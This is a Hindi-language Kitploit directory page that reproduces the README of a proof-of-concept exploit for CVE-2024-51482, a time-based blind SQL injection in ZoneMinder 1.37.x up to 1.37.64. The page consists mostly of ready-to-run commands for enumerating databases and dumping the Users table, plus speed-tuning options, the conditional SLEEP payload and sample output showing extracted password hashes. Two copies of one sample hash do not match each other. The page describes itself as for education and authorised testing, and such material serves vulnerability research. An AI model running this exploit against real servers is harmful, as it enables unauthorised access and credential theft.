Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-51482-PoC — ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) के लिए प्रमाणीकृत समय-आधारित ब्लाइंड SQL इंजेक्शन PoC | Kitploit
उपकरण/GitHubGitHub/plur1bu5/cve-2024-51482-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) के लिए प्रमाणीकृत समय-आधारित ब्लाइंड SQL इंजेक्शन PoC

रिपॉजिटरी देखें
145 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-51482-PoC

प्रमाणित समय-आधारित ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट ZoneMinder v1.37. <= 1.37.64* के लिए

अवलोकन

यह CVE-2024-51482 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो ZoneMinder के ईवेंट प्रबंधन कार्यक्षमता में एक समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता है। एक्सप्लॉइट को प्रमाणीकरण की आवश्यकता होती है और डेटाबेस से डेटा निकालने के लिए सशर्त SLEEP क्वेरी का उपयोग करता है।

विशेषताएँ

  • प्रमाणित शोषण - क्रेडेंशियल्स या सेशन कुकी के साथ लॉगिन करें लंबाई का पता लगाना - निष्कर्षण से पहले स्ट्रिंग की सटीक लंबाई खोजने के लिए बाइनरी सर्च
  • समानांतर निष्कर्षण - गति के लिए मल्टी-थ्रेडेड कैरेक्टर निष्कर्षण
  • sqlmap-शैली विकल्प - डेटाबेस, टेबल, कॉलम की गणना करें और डेटा डंप करें
  • सुरक्षित डिफ़ॉल्ट - उच्च सटीकता के लिए 3 सेकंड विलंब, 5 थ्रेड
  • प्रगति ट्रैकिंग - वर्बोज़ मोड के साथ रीयल-टाइम निष्कर्षण प्रगति
  • साफ आउटपुट - डंप किए गए डेटा के लिए फॉर्मेटेड टेबल डिस्प्ले

आवश्यकताएँ

root@kitploit:~
pip install requests

त्वरित आरंभ

डिफ़ॉल्ट मोड - क्रेडेंशियल डंप करें

root@kitploit:~
python3 poc.py -t example.local -u admin -p password

सेशन कुकी के साथ

root@kitploit:~
python3 poc.py -t example.local --cookie 'ZMSESSID_value'

वर्बोज़ मोड

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -v

उपयोग

डेटाबेस की गणना करें

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --dbs

टेबल की गणना करें

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm --tables

कॉलम की गणना करें

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

विशिष्ट टेबल डंप करें

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

विकल्प

root@kitploit:~
आवश्यक:
  -t, --target TARGET       लक्ष्य URL (IP, होस्टनाम, या पूर्ण URL)
  
प्रमाणीकरण:
  -u, --username USERNAME   प्रमाणीकरण के लिए उपयोगकर्ता नाम
  -p, --password PASSWORD   प्रमाणीकरण के लिए पासवर्ड
  --cookie COOKIE           सेशन कुकी (ZMSESSID)

गणना:
  --dbs                     डेटाबेस की गणना करें
  -D, --database DATABASE   उपयोग करने के लिए डेटाबेस
  --tables                  टेबल की गणना करें
  -T, --table TABLE         उपयोग करने के लिए टेबल
  --columns                 कॉलम की गणना करें
  --dump                    टेबल डेटा डंप करें

प्रदर्शन:
  --delay DELAY             सेकंड में समय विलंब (डिफ़ॉल्ट: 3, सुरक्षित)
  --threads THREADS         थ्रेड्स की संख्या (डिफ़ॉल्ट: 5, सुरक्षित)
  -v, --verbose             निष्कर्षण प्रगति दिखाएं

प्रदर्शन ट्यूनिंग

सुरक्षित मोड (अनुशंसित)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • गति: ~2-3 मिनट प्रति पासवर्ड हैश
  • सटीकता: उच्च

तेज़ मोड (त्रुटियां हो सकती हैं)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • गति: ~30-60 सेकंड प्रति पासवर्ड हैश
  • सटीकता: गलत कैरेक्टर उत्पन्न कर सकता है

उदाहरण आउटपुट

root@kitploit:~
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

यह कैसे काम करता है

  1. प्रमाणीकरण - क्रेडेंशियल्स के साथ लॉगिन करता है या प्रदान की गई सेशन कुकी का उपयोग करता है
  2. भेद्यता परीक्षण - सरल SLEEP पेलोड के साथ लक्ष्य की भेद्यता की पुष्टि करता है
  3. लंबाई का पता लगाना - सटीक स्ट्रिंग लंबाई खोजने के लिए बाइनरी सर्च का उपयोग करता है
  4. समानांतर निष्कर्षण - सभी कैरेक्टर स्थानों को एक साथ निकालता है
  5. डेटा प्रदर्शन - परिणामों को साफ टेबल में प्रारूपित करता है

पेलोड प्रारूप

एक्सप्लॉइट सशर्त SLEEP का उपयोग करता है:

root@kitploit:~
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • TRUE स्थिति: कोई विलंब नहीं (0 सेकंड)
  • FALSE स्थिति: पूर्ण विलंब (3 सेकंड)

समस्या निवारण

गलत परिणाम

यदि आपको गलत कैरेक्टर मिलते हैं (जैसे, $ के बजाय 8):

root@kitploit:~
# विलंब बढ़ाएं और थ्रेड कम करें
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

बहुत धीमा

यदि निष्कर्षण बहुत धीमा है:

root@kitploit:~
# विलंब कम करें और थ्रेड बढ़ाएं (सटीकता कम हो सकती है)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

कोई डेटा नहीं मिला

यदि डिफ़ॉल्ट zm.Users मौजूद नहीं है:

root@kitploit:~
# पहले डेटाबेस की गणना करें
python3 poc.py -t example.local -u admin -p password --dbs

# फिर टेबल की गणना करें
python3 poc.py -t example.local -u admin -p password -D database_name --tables

CVE जानकारी

  • CVE ID: CVE-2024-51482
  • प्रभावित संस्करण: ZoneMinder v1.37.* <= 1.37.64
  • समाधान किया गया: v1.37.65
  • भेद्यता प्रकार: समय-आधारित ब्लाइंड SQL इंजेक्शन
  • CVSS स्कोर: निर्धारित होना बाकी

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।

  • इस उपकरण का उपयोग उन प्रणालियों के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की आपके पास स्पष्ट अनुमति नहीं है।
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
  • इस उपकरण के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
  • सुरक्षा मूल्यांकन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

संदर्भ

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

लाइसेंस

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। जिम्मेदारी और नैतिक रूप से उपयोग करें।


⭐ यदि आपको यह उपयोगी लगे, तो कृपया रिपॉजिटरी को स्टार करें!

टूल डाउनलोड करें